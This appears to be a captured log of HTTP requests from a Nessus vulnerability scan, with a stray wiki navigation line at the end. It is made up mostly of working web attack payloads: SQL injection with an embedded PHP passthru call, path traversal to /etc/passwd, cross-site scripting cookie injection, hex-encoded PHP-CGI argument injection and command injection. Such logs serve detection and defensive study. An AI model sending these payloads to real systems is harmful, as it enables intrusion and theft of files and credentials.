GET /wps_shop.cgi?action=showartikel&cat=nessus&catname=nessus&art=|id| HTTP/1.1
GET /wrcontrollite.ssi HTTP/1.1
GET /wsasp.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /wsasp.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /wsdocs/ HTTP/1.1
GET /wsisa.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /wsisa.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /wsnsa.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /wsnsa.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /wspd_cgi.sh/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
GET /wspd_cgi.sh/WService=wsbroker1/webutil/ping.p HTTP/1.1
GET /wstats/ HTTP/1.1
GET /wusage/ HTTP/1.1
GET /wws/ HTTP/1.1
GET /wwsympa/ HTTP/1.1
GET /www-sql/ HTTP/1.1
GET /www.subdomain.domain.7z HTTP/1.1
GET /www.subdomain.domain.Z HTTP/1.1
GET /www.subdomain.domain.bz2 HTTP/1.1
GET /www.subdomain.domain.gz HTTP/1.1
GET /www.subdomain.domain.jar HTTP/1.1
GET /www.subdomain.domain.tld.7z HTTP/1.1
GET /www.subdomain.domain.tld.Z HTTP/1.1
GET /www.subdomain.domain.tld.bz2 HTTP/1.1
GET /www.subdomain.domain.tld.gz HTTP/1.1
GET /www.subdomain.domain.tld.jar HTTP/1.1
GET /www.subdomain.domain.tld.rar HTTP/1.1
GET /www.subdomain.domain.tld.tar HTTP/1.1
GET /www.subdomain.domain.tld.tar.bz2 HTTP/1.1
GET /www.subdomain.domain.tld.tar.gz HTTP/1.1
GET /www.subdomain.domain.tld.tgz HTTP/1.1
GET /www.subdomain.domain.tld.war HTTP/1.1
GET /www.subdomain.domain.tld.z HTTP/1.1
GET /www.subdomain.domain.tld.zip HTTP/1.1
GET /www.subdomain.domain.rar HTTP/1.1
GET /www.subdomain.domain.tar HTTP/1.1
GET /www.subdomain.domain.tar.bz2 HTTP/1.1
GET /www.subdomain.domain.tar.gz HTTP/1.1
GET /www.subdomain.domain.tgz HTTP/1.1
GET /www.subdomain.domain.war HTTP/1.1
GET /www.subdomain.domain.z HTTP/1.1
GET /www.subdomain.domain.zip HTTP/1.1
GET /www/ HTTP/1.1
GET /www/delivery/ac.php?bannerid=-1410938843+OR+1=1+--+';passthru(base64_decode($_SERVER[HTTP_NESSUS_U8B9QO_I]));die;/* HTTP/1.1
GET /www/delivery/ac.php?bannerid=-47+OR+1=1 HTTP/1.1
GET /www/delivery/fc.php?MAX_type=../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /wwwboard.html HTTP/1.1
GET /wwwjoin/ HTTP/1.1
GET /wwwlog/ HTTP/1.1
GET /wwwstat/ HTTP/1.1
GET /wwwstats/ HTTP/1.1
GET /x-news/ HTTP/1.1
GET /x7chat/ HTTP/1.1
GET /xGB/ HTTP/1.1
GET /x_news.php HTTP/1.1
GET /x_news/ HTTP/1.1
GET /xampp/ HTTP/1.1
GET /xampp/adodb.php HTTP/1.1
GET /xampp/index.php HTTP/1.1
GET /xampp/phpldapadmin/ HTTP/1.1
GET /xampp/pla/ HTTP/1.1
GET /xampp/start.php HTTP/1.1
GET /xaradodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
GET /xaraya/ HTTP/1.1
GET /xmb/ HTTP/1.1
GET /xml/ HTTP/1.1
GET /xmldata?item=All HTTP/1.1
GET /xmldata?item=all HTTP/1.1
GET /xmlpserver/ HTTP/1.1
GET /xnews/ HTTP/1.1
GET /xoops/ HTTP/1.1
GET /xsql/demo/airport/airport.xsql?xml-stylesheet=none HTTP/1.1
GET /xtemp/ HTTP/1.1
GET /yabb/ HTTP/1.1
GET /yabb2/ HTTP/1.1
GET /yabbse/ HTTP/1.1
GET /yapig/ HTTP/1.1
GET /yappa-ng/ HTTP/1.1
GET /yappa/ HTTP/1.1
GET /ymck9zsj.asp?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.asp?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.aspx?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.aspx?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.cfc?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.cfc?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.cfm?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.cfm?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.cgi?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.cgi?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.dll?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.dll?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.do?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.do?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.exe?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.exe?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.fts?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.fts?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.htm?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.htm?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.html?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.html?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.idc?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.idc?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.jsp?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.jsp?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.jspa?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.jspa?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.kspx?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.kspx?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.mscgi?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.mscgi?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.nsf?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.nsf?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.php3?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.php3?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.php?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.php?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.pl?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.pl?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /ymck9zsj.x?<meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET /ymck9zsj.x?<scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET /zMr_cx1Q.rem HTTP/1.1
GET /zabbix/ HTTP/1.1
GET /zb41/ HTTP/1.1
GET /zboard/ HTTP/1.1
GET /zen-cart/ HTTP/1.1
GET /zen/ HTTP/1.1
GET /zencart/ HTTP/1.1
GET /zenphoto/ HTTP/1.1
GET /zenworks/jsp/fw/internal/Login.jsp HTTP/1.1
GET /zipfiles/ HTTP/1.1
GET /zixforum/ HTTP/1.1
GET /zml.cgi?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
GET /zpanel.php?page=/etc/passwd%00 HTTP/1.1
GET /zpanel/ HTTP/1.1
GET /~1/ HTTP/1.1
GET /~admin/ HTTP/1.1
GET /~log/ HTTP/1.1
GET /~nobody/etc/passwd HTTP/1.1
GET /~root/ HTTP/1.1
GET /~stats/ HTTP/1.1
GET /~webstats/ HTTP/1.1
GET /~wsdocs/ HTTP/1.1
GET 1410939020:@(ip addr)/ HTTP/1.1
GET 1410939024:@(ip addr)/
GET <IMG%20SRC=\
GET <meta%20http-equiv=Set-Cookie%20content=%22testcacm=2894%22> HTTP/1.1
GET <scr ipt>cross_site_scripting.nasl</script> HTTP/1.1
GET <scr ipt>document.cookie=%22testcacm=2894;%22</script> HTTP/1.1
GET admin/index.php HTTP/1.1
GET c:\\boot.ini HTTP/1.1
GET faq.php?skin=../../admin/manager&tplpath=admin HTTP/1.1
GET http://rfi.nessus.org/check_proxy.html HTTP/1.0
GET multihtml.pl?multi=/etc/passwd%00html HTTP/1.1
GKXGAF / HTTP/1.1
GNUTELLA CONNECT/0.4
GNUTELLA CONNECT/0.6
HEAD /someunexistantstuff.exe HTTP/1.1
HEAD /someunexistantstuff1449754988653652385.html HTTP/1.1
NESSUS / HTTP/1.0
OPTIONS * HTTP/1.1
OPTIONS / HTTP/1.1
OPTIONS /error/ HTTP/1.1
POST / HTTP/1.0
POST / HTTP/1.1
POST /%70%68%70%70%61%74%68/%70%68%70?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
POST /EucalyptusWebBackend HTTP/1.1
POST /FormHandler.cgi HTTP/1.1
POST /admin/admin.cgi HTTP/1.1
POST /av-centerd HTTP/1.1
POST /cgi-bin/EucalyptusWebBackend HTTP/1.1
POST /cgi-bin/admin/admin.cgi HTTP/1.1
POST /cgi-bin/formmail HTTP/1.0
POST /cgi-bin/formmail.pl HTTP/1.0
POST /cgi-bin/getpassword.php HTTP/1.1
POST /cgi-bin/index.php HTTP/1.1
POST /cgi-bin/kb.cgi?view='&lang=en HTTP/1.1
POST /cgi-bin/login.php HTTP/1.1
POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
POST /cgi-bin/samba/smbshr.pl HTTP/1.1
POST /cgi-bin/smbshr.pl HTTP/1.1
POST /formmail HTTP/1.0
POST /formmail.pl HTTP/1.0
POST /getpassword.php HTTP/1.1
POST /gw/webacc?User.interface=/../webacc/hdml HTTP/1.1
POST /gw/webacc?User.interface=/../webacc/hdml&User.id=\
POST /index.php HTTP/1.1
POST /index.php?-d+allow_url_include%3don+-d+safe_mode%3doff+-d+suhosin.simulation%3don+-d+open_basedir%3doff+-d+auto_prepend_file%3dphp%3a//input+-n HTTP/1.1
POST /kb.cgi?view='&lang=en HTTP/1.1
POST /login.php HTTP/1.1
POST /perl/ HTTP/1.1
POST /samba/smbshr.pl HTTP/1.1
POST /scripts/EucalyptusWebBackend HTTP/1.1
POST /scripts/admin/admin.cgi HTTP/1.1
POST /scripts/formmail HTTP/1.0
POST /scripts/formmail.pl HTTP/1.0
POST /scripts/getpassword.php HTTP/1.1
POST /scripts/index.php HTTP/1.1
POST /scripts/kb.cgi?view='&lang=en HTTP/1.1
POST /scripts/login.php HTTP/1.1
POST /scripts/samba/smbshr.pl HTTP/1.1
POST /scripts/smbshr.pl HTTP/1.1
POST /servlet/webacc?User.interface=/../webacc/hdml HTTP/1.1
POST /servlet/webacc?User.interface=/../webacc/hdml&User.id=\
POST /smbshr.pl HTTP/1.1
POST /something/maybe/ping HTTP/1.1
POST /spipe?Source=nessus HTTP/1.0
POST /topic HTTP/1.1
PROPFIND / HTTP/1.1
PUT /goarrp1.html HTTP/1.1
SEARCH / HTTP/1.1
Secure * Secure-HTTP/1.4
TRACE /Nessus348343671.html HTTP/1.1
TRACK /Nessus348343671.html HTTP/1.1
\x16\x03\x01
some invalid request

  • PukiWikiスキンのBootstrap版 Prev
  • Next